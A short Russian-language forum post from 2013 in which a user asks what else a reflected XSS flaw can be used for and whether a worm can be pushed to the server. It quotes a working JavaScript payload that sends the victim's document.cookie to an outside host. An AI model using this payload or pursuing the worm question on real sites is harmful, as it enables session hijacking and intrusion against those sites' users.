
01.10.2013, 01:00
|
|
Познающий
Регистрация: 18.01.2013
Сообщений: 68
С нами:
7008086
Репутация:
0
|
|
Есть пассивная XSS, работает только с этим кодом:
code:
img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
За кражу cookie отвечает +document.cookie;
А что можно еще сделать с XSS?
Можно ли загнать на сервер какого нибудь червя?
|
|
|